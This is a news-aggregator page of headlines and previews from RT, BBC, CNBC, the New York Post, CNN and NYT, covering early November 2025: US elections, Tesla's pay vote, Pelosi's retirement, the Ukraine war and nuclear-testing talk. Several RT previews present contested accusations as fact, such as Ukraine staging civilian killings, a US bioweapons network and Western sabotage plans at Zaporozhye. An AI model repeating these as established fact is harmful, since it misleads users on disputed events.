President Donald Trump lost big in Tuesday's elections, as voters rejected candidates he endorsed and causes he championed around the country

Article link

Date of publish: Wed, 05 Nov 2025 14:30:17 GMT

Teacher shot by 6-year-old awarded $10 million

Jurors found a former assistant principal liable Thursday for the 2023 classroom shooting of a teacher by a 6-year-old student, awarding the teacher $10 million.

Article link

Date of publish: Thu, 06 Nov 2025 17:47:58 GMT

ICE's use of smartphones to determine citizenship could trigger the next constitutional crisis

Immigration enforcement’s use of facial recognition technology could potentially trigger a constitutional crisis.

Article link

Date of publish: Thu, 06 Nov 2025 11:00:40 GMT

Following a legendary run, Nancy Pelosi to retire from Congress at the end of her term

Nancy Pelosi, the first woman to serve as House speaker, released a video on Thursday morning to announce that she is not seeking re-election to a 21st term in 2026.

Article link

Date of publish: Thu, 06 Nov 2025 14:06:24 GMT

RT - Daily news

Elon Musk gets $1 trillion pay package approved

Preview Tesla shareholders have approved an unprecedented compensation package for CEO Elon Musk, potentially worth up to $1 trillion
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 22:46:08 +0000

Russia marks liberation of Kiev from Nazis

Preview Russia commemorated the 82nd anniversary of the Red Army’s liberation of Kiev from Nazi forces on Thursday
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 22:26:40 +0000

Pharma rep collapses as Trump announces drug price cuts (VIDEO)

Preview The US president has announced a new deal that would lower the price of some weight loss medications
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 22:03:15 +0000

What does a ‘socialist’ in charge of New York really mean?

Preview Mayor-elect Zohran Mamdani is hated both by Republicans and his own fellow Democrats because he wants to bring change. But can he?
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 21:33:09 +0000

Polish president bemoans Ukraine’s ‘lack of gratitude’

Preview Kiev has shown a “lack of gratitude” despite Warsaw’s continuous support, Polish President Karol Nawrocki has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 21:24:15 +0000

UN Security Council lifts sanctions on Syria’s president

Preview The US-drafted resolution has also removed sanctions on Syrian Interior Minister Anas Khattab
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 21:23:46 +0000

NATO now outproducing Russia in ammo – Rutte

Preview NATO Secretary General Mark Rutte said the bloc is launching new plants and expanding existing ones, urged the allies to sustain the buildup
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 20:58:48 +0000

Nancy Pelosi reveals when she will retire from Congress

Preview Former speaker of the US House of Representatives Nancy Pelosi has announced that she will leave Congress after her term ends in 2027
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 20:53:52 +0000

German arms giant reports booming sales and profits

Preview German arms maker Rheinmetall has reported a 20% year-on-year rise in revenue, driven by exports to Ukraine and soaring EU defense spending
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 20:13:38 +0000

People will ‘flee communism’ in NYC – Trump

Preview US President Donald Trump has claimed New Yorkers will flee after self-described democratic socialist Zohran Mamdani was elected mayor
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 17:49:37 +0000

US seeking to expand military presence in Syria – Reuters

Preview The US and the new Syrian government are in discussions over the deployment of American troops to an airbase near Damascus
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 17:27:23 +0000

Missiles return to Europe – what direction are they pointing in?

Preview From Paris to Berlin, the EU’s “missile revival” looks impressive on paper – but few of its systems have ever faced a real war
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 17:18:42 +0000

YouTube erases hundreds of videos of alleged Israeli war crimes – media

Preview YouTube has reportedly deleted 700 clips documenting alleged Israeli abuses in Gaza and the West Bank
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 16:42:27 +0000

Moscow calls out NATO chief

Preview NATO chief Mark Rutte is using double standards toward Moscow and Beijing, Russian Foreign Ministry spokeswoman Maria Zakharova has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 16:23:01 +0000

EU conductor under fire for accepting Russian honor – Politico

Preview German pianist and conductor Justus Frantz is facing backlash in Berlin for receiving Russia’s Order of Friendship, Politico has reported
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 16:06:23 +0000

Is the Kremlin hacking the brains of small-time crooks in Paris now?

Preview A case of petty vandalism has shown that European officials and media will cry ‘Russia!’ at every opportunity, however dumb they sound
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 15:40:52 +0000

Human blood swastikas found all over German town – police

Preview Authorities say a 31-year-old Romanian man was detained after dozens of swastikas painted in human blood were found across Hanau
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 15:34:38 +0000

India’s army chief inspects new combat drones (VIDEO)

Preview During a field tour, General Upendra Dwivedi was briefed on several initiatives to boost combat readiness
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 15:18:48 +0000

Kiev illegally tried to conscript ethnic Hungarians – Budapest

Preview Ukraine has illegally attempted to mobilize ethnic Hungarian students, Budapest has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 14:46:48 +0000

Poland in talks to channel US LNG to Ukraine and Slovakia – Reuters

Preview Shipments of US gas to Ukraine and Slovakia via Poland could reportedly reach up to 5 billion cubic meters annually
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 14:09:07 +0000

Orban heads to meet Trump: How conservative allies are repairing Biden-era damage

Preview Hungarian Prime Minister Viktor Orban has welcomed a “new phase” in relations with the US under President Donald Trump
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 13:37:19 +0000

South African police minister denies 7,500 firearms lost to criminals

Preview South Africa’s police minister says a taskforce has been established to verify all service weapons reported lost or stolen
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 13:35:25 +0000

US ends temporary protected status for African state

Preview The Department of Homeland Security has said conditions in South Sudan no longer meet the requirements for temporary protected status
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 13:12:48 +0000

EU planning more entry restrictions for Russians – Politico

Preview Brussels is reportedly looking to stop issuing the potential visitors multi-entry Schengen visas
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 12:31:15 +0000

South Africa doesn’t belong in G20 – Trump

Preview US President Donald Trump has said South Africa should not be part of the G20, saying that he will skip the summit in Johannesburg
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 12:22:05 +0000

NATO chief urges West to prepare for long-term confrontation with Russia

Preview Moscow will remain a threat to the bloc even after the Ukraine conflict ends, Mark Rutte has claimed
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 12:18:12 +0000

The great American offload: Did the US just find a new place to send its problems?

Preview African experts warn that deals to accept deportees from the US could compromise principles of state sovereignty
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 12:17:04 +0000

India and Indonesia close to sealing BrahMos missile deal – media

Preview The agreement, which still requires approval from Moscow, would mark a significant milestone for New Delhi’s defense exports
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 11:55:31 +0000

US Navy SEALs eyed for Maduro murder mission – NYT

Preview The US is considering launching airstrikes on Venezuela and deploying special forces  
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 11:46:16 +0000

Suez Canal cargo traffic surges

Preview The Suez Canal Authority has reported rising traffic and improved cargo volumes
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 10:34:46 +0000

Man shouting ‘Allahu Akbar’ goes on car rampage on French island

Preview A French man who shouted “Allahu Akbar” after ramming five people on the island of Oleron reportedly claimed he “self-radicalized” online
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 09:43:02 +0000

Complaints about ‘illegal’ Ukrainian mobilization double – ombudsman

Preview Ukrainians reported Kiev’s notorious press gangs nearly 5,000 times this year, Dmitry Lubinets has said
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 09:35:18 +0000

Military plane crashes in war-torn Sudan

Preview Sudan’s paramilitary RSF has claimed it shot down an army ‘warplane’ that allegedly killed dozens of civilians in airstrikes
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 09:32:03 +0000

West planning major sabotage at Zaporozhye nuclear plant – Moscow

Preview European NATO members are pushing Kiev to cause an accident at the facility and blame it on Russia
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 09:10:46 +0000

The crescent and star divide: Ankara’s golden child just ran away from home

Preview A quiet election on a divided island may mark the beginning of the end for Turkish dominance in the Eastern Mediterranean
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 08:11:06 +0000

Ukraine to lose key city within one week – Russian military commander

Preview Russia’s Ministry of Defense has released footage which challenges Kiev’s account of the fighting
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 05:31:22 +0000

Goalie tries to ‘steal’ Ovechkin’s record 900th puck (VIDEO)

Preview Alexander Ovechkin made history on Wednesday night by becoming the first player in NHL history to score 900 regular-season goals
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 03:19:52 +0000

Trump reiterates nuclear threat in AI-generated VIDEO

Preview The US president has again promised to restart nuclear testing “immediately,” following President Vladimir Putin’s moratorium warning
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 01:38:54 +0000

Angelina Jolie’s bodyguard conscripted in Ukraine (VIDEO)

Preview Ukrainian draft officers stopped the vehicle carrying the celebrity at a roadblock and detained a member of her security escort
Read Full Article at RT.com

Article link

Date of publish: Thu, 06 Nov 2025 00:36:18 +0000

Trump shares what Putin allegedly told him about Ukraine

Preview The US president claims his Russian counterpart said it was Washington’s turn to try and settle the conflict
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 23:13:52 +0000

Ukraine slaughters civilians, then blames Russia – again

Preview Kiev is predictably trying to spin its own war crimes as Moscow’s
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 22:38:24 +0000

West failing to weaken and divide Russia – Putin

Preview President Vladimir Putin has accused the West of attempting to weaken and divide Russia
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 21:15:00 +0000

Kremlin comments on US ICBM test

Preview The US had notified Moscow ahead of the launch of a Minuteman III missile earlier on Wednesday, Dmitry Peskov has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 21:12:54 +0000

US ‘may be working on plan to denuclearize’ with Russia and China – Trump

Preview The claim comes after the US president ordered the start of preparations for nuclear testing
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 21:07:22 +0000

Kiev prosecutors targeting Western-backed anti-graft agency

Preview Ukrainian prosecutors have raided the home of an anti-corruption agency employee, accusing him of illegal surveillance
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 20:34:30 +0000

Ukrainian commander laments massive desertions

Preview Sergey Filimonov, the commander of an elite Ukrainian battalion, has suggested that Kiev’s forces are facing an acute desertion problem
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 20:19:26 +0000

Another migrant convict wrongly freed from UK prison – media

Preview A registered sex offender of Algerian origin has been mistakenly freed from a London jail in the second such error in two weeks
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 18:47:54 +0000

Russian gymnasts reflect on return to world stage

Preview Russian athletes have finished fourth in the overall medal count at the 2025 Artistic Gymnastics World Championships in Jakarta
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 17:32:51 +0000

Ex-EU justice head charged with money laundering

Preview Former EU Commissioner Didier Reynders, who oversaw the bloc’s seizure of Russian assets, has been charged with money laundering
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 16:28:48 +0000

Draft bill in South Africa seeks tougher controls on opinion polls

Preview ActionSA, an opposition party that introduced the measure, is calling for an oversight body to ensure compliance by polling firms
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 16:26:42 +0000

Man gropes Mexico’s president (VIDEO)

Preview Mexican President Claudia Sheinbaum was groped during a public walk in the capital on Tuesday
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 16:19:02 +0000

West denying reality – Shoigu

Preview The West’s attempts to hinder the emergence of a multipolar world are futile, Russia’s Security Council chief Sergey Shoigu has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 16:14:12 +0000

Russian air unit witnesses Ukrainian drone killing of civilians (GRAPHIC VIDEO)

Preview A new audio obtained by RT highlights the emotional reaction of a Russian drone operator to Ukrainian UAVs murdering civilians
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 16:12:41 +0000

Head of Britain’s richest family dies at 85

Preview Gopichand P. Hinduja was chairman of Hinduja Group, a Mumbai-headquartered multinational conglomerate
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 15:59:41 +0000

Russia doubles diamond exports to India – report

Preview Russian diamond exports to India surged in August to their highest level since April
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 15:15:22 +0000

Ukrainian commanders fear ‘serious military defeat’ – Bild

Preview Troops encircled in Kupyansk and Krasnoarmeysk may not survive as Zelensky faces growing criticism, Bild has reported
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 15:11:56 +0000

Reporter fired after question on EU’s contrasting approach to Israel and Russia

Preview Italian journalist Gabriele Nunziati has been dismissed after asking about EU’s contradictory positions on Gaza and Ukraine conflicts
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 14:57:33 +0000

Ukrainian draft enforcers snatch teacher in front of students (VIDEO)

Preview Another incident of forced mobilization has been filmed in the country’s capital, Kiev
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 14:50:27 +0000

In case you still doubt Ukraine’s neo-Nazi problem

Preview When Nazi imagery is prominent on the social media of the country’s leader, you would think somebody would notice
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 14:37:45 +0000

Water sports bosses lift team ban on Russia

Preview World Aquatics has permitted Russia and Belarus to compete in aquatic team events from 2026 under a neutral flag
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 14:19:27 +0000

Russia should prepare for full-scale nuclear tests – defense minister (VIDEO)

Preview Moscow needs to prepare to conduct full-scale nuclear weapons tests in response to Washington’s plan, Defense Minister Andrey Belousov said
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 14:04:52 +0000

Africa expert decodes Trump’s Nigeria rhetoric

Preview Donald Trump’s comments on Nigeria are designed to please his own electorate base, Andrey Maslov has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 13:55:30 +0000

Serbia doesn’t need to justify ties with Russia and China – Vucic

Preview Serbia has resisted Western pressure to antagonize Russia, citing its historic and strategic links
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 13:54:35 +0000

US discusses ‘security interests’ with African state

Preview US Deputy Secretary of State Christopher Landau has said he had an “excellent” call with Mali’s foreign minister
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 12:25:03 +0000

Blocking Russian asset sale could trigger oil supply crisis – trader 

Preview Lukoil has moved to sell its overseas assets to the Swiss-based trader following the latest US sanctions
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 12:07:45 +0000

IAEA chief condemns Trump’s nuclear test plan

Preview Donald Trump’s plan to restart nuclear tests threatens global stability and the non-proliferation regime, IAEA chief Rafael Grossi has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 11:10:59 +0000

EU membership for Ukraine would mean war – Orban

Preview Hungary has every right to oppose Ukraine’s entry into the EU, Prime Minister Viktor Orban has said
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 10:44:13 +0000

Russia urges ICC to drop Sudan case

Preview The Russian Embassy in Egypt has called for the withdrawal of the Darfur war crimes case from the ICC
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 10:41:55 +0000

India and Israel sign defense deal

Preview The Indian and Israeli militaries have agreed to promote co-development and co-production of weapons
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 10:40:13 +0000

Nigeria rejects Trump’s claims on Christian killings

Preview Nigeria’s foreign minister has said religious persecution is impossible, given constitutional guarantees on freedom of faith
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 09:17:07 +0000

Germany to sharply increase funding for Ukraine – Reuters

Preview German aid to Ukraine could reach €11.5 billion ($13.2 billion) next year, according to Reuters, citing sources
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 08:41:39 +0000

Zelensky ‘divorced from reality’ – Russian MOD

Preview The Russian Defense Ministry has accused Zelensky of making statements about the front divorced which are from reality
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 08:03:53 +0000

EU leaders skipping Latin America summit to avoid upsetting Trump – FT

Preview European leaders are reportedly skipping the EU-CELAC summit to avoid annoying US President Donald Trump
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 06:53:45 +0000

Uganda‑born socialist Zohran Mamdani elected New York City mayor

Preview Progressive Democratic nominee Zohran Mamdani is projected to win the mayoralty of New York City, according to estimates by CNN and NBC
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 03:01:48 +0000

Kremlin expects Trump to clarify nuclear test claims

Preview The Kremlin has called for clarification from Washington following recent remarks by US President Donald Trump
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 02:12:17 +0000

NATO spy ship observed test of Russia’s nuclear-powered missile – Putin

Preview Foreign military experts had the opportunity to verify the capabilities of the Burevestnik cruise missile, the Russian president said
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 00:49:13 +0000

Zelensky tours neo-Nazi units (VIDEOS)

Preview Ukrainian leader Vladimir Zelensky has toured multiple military units, including the notorious 1st Azov Corps
Read Full Article at RT.com

Article link

Date of publish: Wed, 05 Nov 2025 00:20:21 +0000

Horrifying UPS cargo plane crash caught on VIDEO

Preview Dramatic video footage has emerged online showing the moment a UPS cargo jet crashed during takeoff from Louisville airport in in Kentucky
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 23:32:17 +0000

US cargo plane crashes immediately after takeoff (VIDEOS)

Preview A cargo plane has crashed near Louisville Muhammad Ali International Airport in Kentucky, according to preliminary reports
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 22:54:34 +0000

Kremlin comments on Serbia’s offer to sell arms to EU

Preview The Kremlin has attributed Serbian President Aleksandar Vucic’s offer to sell arms to Kiev’s backers within the EU to Western pressure
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 21:55:12 +0000

Is Trump plotting to be ‘king for life’?

Preview The 47th president of the US continues to dismiss rumors of a planned third term – but will he change his mind and find a way after all?
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 21:43:53 +0000

Russia’s G20 summit delegation revealed

Preview Russian President Vladimir Putin has approved the officials to represent Moscow at the upcoming G20 summit in South Africa
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 21:15:51 +0000

Putin orders rare-earth metals strategy

Preview Russian President Vladimir Putin has ordered his cabinet to approve a roadmap for rare-earth minerals extraction by December
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 20:22:05 +0000

Biological frontlines: How the US built a bioweapons network on Russia’s doorstep

Preview Why a US-built facility near Tbilisi continues to raise questions about America’s biological research abroad
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 19:32:27 +0000

Trump Jr. denounces BBC as ‘fake news’

Preview Donald Trump Jr. has slammed the BBC after the Telegraph reported that it had mendaciously edited a video of a speech by his father
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 18:50:02 +0000

Russia’s new weaponry to ensure strategic parity for whole century – Putin

Preview Moscow does not threaten anyone but is steadily developing its nuclear arsenal, the Russian president has said
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 18:46:57 +0000

Germany’s war fantasy has progressed to Tolkien levels

Preview A baffling clip celebrating a new tank brigade stationed in Lithuania shows the depth of the Berlin’s military delusions
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 18:36:08 +0000

Putin congratulates Russians on National Unity Day

Preview President Vladimir Putin has hailed the unity of the Russian people, saying they defend the nation today just as they did 400 years ago
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 17:44:05 +0000

EU considers ‘probation’ for new members

Preview The EU could introduce a “probation” mechanism for new members of the bloc, potentially allowing their expulsion
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 17:00:00 +0000

Ukrainians behind theft of EU citizens’ personal data – Orban

Preview The database containing personal information of 200,000 Hungarian citizens was reportedly leaked online
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 16:54:27 +0000

UK politicians want to make protesting them jailable offense

Preview A proposed law would criminalize demonstrations outside MPs homes with penalties of up to six months in prison
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 16:33:29 +0000

Ukraine-aid critic to lead new Czech government

Preview Incoming Czech Prime Minister Andrej Babis’ ANO party has signed a coalition deal with two anti-EU parties
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 15:57:52 +0000

North Korea’s last ceremonial leader dies – Pyongyang

Preview Kim Yong-nam, North Korea’s former nominal head of state, has passed away aged 97
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 15:54:41 +0000

Russia-China trade almost 100% outside Western currencies – finance minister

Preview Over 99% of payments are now in rubles and yuan, Anton Siluanov has said at a financial forum in Beijing
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 15:42:38 +0000

Ukrainian MPs reveal shocking surge in national debt

Preview Ukraine’s public debt has tripled since 2022, prompting Kiev’s foreign sponsors to find new ways to fund its war chest
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 14:07:15 +0000

Russia and China issue roadmap for relations

Preview Russia and China have pledged to expand cooperation across multiple spheres and jointly respond to external challenges in a joint communique
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 12:23:43 +0000

Iraq war architect Cheney dead aged 84

Preview Former US Vice President Dick Cheney has died from complications of pneumonia and heart and vascular disease
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 11:31:18 +0000

Serbia will hold early elections – Vucic

Preview Serbian President Aleksandar Vucic has said he will call snap parliamentary elections amid anti-government protests
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 11:23:27 +0000

The West has lost its soul – Russia intends to keep its own

Preview A nation that has buried empires now reaches for a new dream of its own
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 11:07:09 +0000

Modi’s tax reform boosts India’s domestic demand – Bloomberg

Preview Retail sales during India’s biggest festival, Diwali, celebrated in October, were over $67 billion
Read Full Article at RT.com

Article link

Date of publish: Tue, 04 Nov 2025 10:47:58 +0000

News

News feeds below.

BBC News

COP30: World leaders take aim at Trump for climate inaction

World leaders address COP30 climate summit in Belém and take aim at Trump record on climate change.

Article link

Date of publish: Thu, 06 Nov 2025 19:33:59 GMT

Typhoon Kalmaegi hits Vietnam after killing at least 114 in Philippines

More than 260,000 soldiers are on standby for rescue efforts as winds of up to 92mph (149km/h) hit Vietnam.

Article link

Date of publish: Thu, 06 Nov 2025 15:54:08 GMT

Russian soldier sentenced to life in jail in unprecedented Ukrainian trial

In the first ruling of its kind, Dmitry Kurashov was found guilty of killing an unarmed Ukrainian soldier who had surrendered.

Article link

Date of publish: Thu, 06 Nov 2025 18:09:34 GMT

US Top News and Analysis

Tesla says shareholders approve Musk's $1 trillion pay plan with over 75% voting in favor

Tesla shareholders approved CEO Elon Musk's historic pay package at the company's annual shareholders meeting in Austin, Texas.

Article link

Date of publish: Thu, 06 Nov 2025 23:23:04 GMT

SNAP benefits must be fully paid by Trump administration by Friday, judge orders

The Trump administration recently said it would not pay any SNAP benefits, but then offered partial funding of the food stamp program after a judge's ruling.

Article link

Date of publish: Thu, 06 Nov 2025 22:28:21 GMT

Trump AI czar Sacks says 'no federal bailout for AI' after OpenAI CFO's comments

Sacks' comments came after OpenAI CFO Sarah Friar mentioned a federal "backstop" during a conference.

Article link

Date of publish: Thu, 06 Nov 2025 18:11:40 GMT

New York Post

Los Angeles put politics first — and sparked its worst-ever wildfire

City leaders put politics over preparedness, allowing January's disastrous Palisades Fire to burn out of control — and bringing on a collapse in morale and public trust.

Article link

Date of publish: Thu, 06 Nov 2025 18:27:40 -0500

‘Grand Theft Auto VI’ release date delayed by months for a second time

Shares of the company, which had previously said it would launch the title on May 26, were down 7% in extended trading.

Article link

Date of publish: Thu, 06 Nov 2025 18:25:29 -0500

Charges against ‘Jersey Boy jihadists’ show Islamic radicalization can touch any community, Alina Habba warns

19-year-old Montclair residents Tomas-Kaan Jimenez-Guzel and Milo Sedarat were both arrested for allegedly plotting ISIS-inspired terror attacks and spewing antisemitism.

Article link

Date of publish: Thu, 06 Nov 2025 18:23:45 -0500

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

NYT > Top Stories

Tesla Investors Back Musk’s Trillion Dollar Payday

Shareholders approved a plan to grant Mr. Musk shares worth nearly $1 trillion if he meets ambitious goals, including vastly expanding the company’s stock market valuation.

Article link

Date of publish: Thu, 06 Nov 2025 22:56:11 +0000

Judge Orders Trump Administration to Fully Fund SNAP Benefits This Month

The Justice Department later said it would appeal, leaving the program known as SNAP in limbo.

Article link

Date of publish: Thu, 06 Nov 2025 22:56:18 +0000

Here Are Airports That Could Be Affected by the Air Traffic Slowdown

The cuts to flights are expected to begin Friday and deepen over the weekend to reach a 10 percent reduction in air traffic.

Article link

Date of publish: Thu, 06 Nov 2025 19:56:48 +0000

BBC News

COP30: World leaders take aim at Trump for climate inaction

World leaders address COP30 climate summit in Belém and take aim at Trump record on climate change.

Article link

Date of publish: Thu, 06 Nov 2025 19:33:59 GMT

Typhoon Kalmaegi hits Vietnam after killing at least 114 in Philippines

More than 260,000 soldiers are on standby for rescue efforts as winds of up to 92mph (149km/h) hit Vietnam.

Article link

Date of publish: Thu, 06 Nov 2025 15:54:08 GMT

Russian soldier sentenced to life in jail in unprecedented Ukrainian trial

In the first ruling of its kind, Dmitry Kurashov was found guilty of killing an unarmed Ukrainian soldier who had surrendered.

Article link

Date of publish: Thu, 06 Nov 2025 18:09:34 GMT

Sudan's RSF paramilitaries agree humanitarian ceasefire

The group issued the statement after an 18-month siege of the city of el-Fasher in the western Darfur region.

Article link

Date of publish: Thu, 06 Nov 2025 17:23:03 GMT

Elon Musk's $1tn pay deal approved by Tesla shareholders

The richest man in the world will get hundreds of millions of new shares if he hits his targets.

Article link

Date of publish: Thu, 06 Nov 2025 23:25:25 GMT

Nancy Pelosi announces retirement after decades in US Congress

Pelosi made history as the first female Speaker and left an indelible mark on US politics.

Article link

Date of publish: Thu, 06 Nov 2025 19:59:02 GMT

UN lifts sanctions on Syrian president ahead of White House visit

US ambassador to the UN Mike Waltz said the move sent a "strong political signal" that Syria was in a "new era".

Article link

Date of publish: Thu, 06 Nov 2025 22:54:25 GMT

Greek coastguard chief to be prosecuted over deadly migrant shipwreck

Vice Adm Tryfon Kontizas is one of four senior coastguard figures to face manslaughter charges over the 2023 disaster.

Article link

Date of publish: Thu, 06 Nov 2025 17:39:06 GMT

Louvre criticised for spending money on art instead of security in years before heist

Three weeks after the spectacular jewel theft at the Louvre, the museum is accused of neglecting safety and security.

Article link

Date of publish: Thu, 06 Nov 2025 13:49:36 GMT

Afghan opium crop plummets after Taliban ban, UN survey finds

Afghanistan used to produce more than 80% of global opium but a Taliban ban has cut that to a fraction.

Article link

Date of publish: Thu, 06 Nov 2025 12:00:39 GMT

Boeing criminal case linked to deadly 737 crashes dropped

The judge said he did not believe the decision was in the public interest but he did not have authority to deny the request.

Article link

Date of publish: Thu, 06 Nov 2025 17:34:13 GMT

World’s oldest president sworn in for eighth term in Cameroon

Paul Biya has been in power since 1982 - the opposition says the election was rigged.

Article link

Date of publish: Thu, 06 Nov 2025 16:32:49 GMT

Trump wants South Africa out of the G20 as it gears up for world summit

The US leader has repeatedly accused South Africa of persecuting its white minority - which Pretoria denies.

Article link

Date of publish: Thu, 06 Nov 2025 16:39:01 GMT

Pirates fire grenades and board vessel off Somali coast

The attack comes amid a resurgence of piracy in the region in recent days.

Article link

Date of publish: Thu, 06 Nov 2025 11:49:27 GMT

Israel says Hamas returned body of dead Tanzanian hostage

Joshua Mollel, a 21-year-old agriculture student, was killed at Kibbutz Nir Oz during the Hamas-led 7 October 2023 attack on Israel.

Article link

Date of publish: Thu, 06 Nov 2025 10:46:17 GMT

Mexico president to seek charges after being groped on street

Claudia Sheinbaum says she is pressing charges because "a line must be drawn" against the harassment of Mexican women.

Article link

Date of publish: Wed, 05 Nov 2025 21:00:41 GMT

Appeal to stop ostrich cull dismissed by Canada's top court

The farmers have few legal options left, as officials say they will now kill more than 300 ostriches.

Article link

Date of publish: Thu, 06 Nov 2025 16:36:19 GMT

US boat strikes are crimes against humanity, says former ICC prosecutor

The Trump administration has sought to justify the strikes by saying it is in an armed conflict with drugs gangs.

Article link

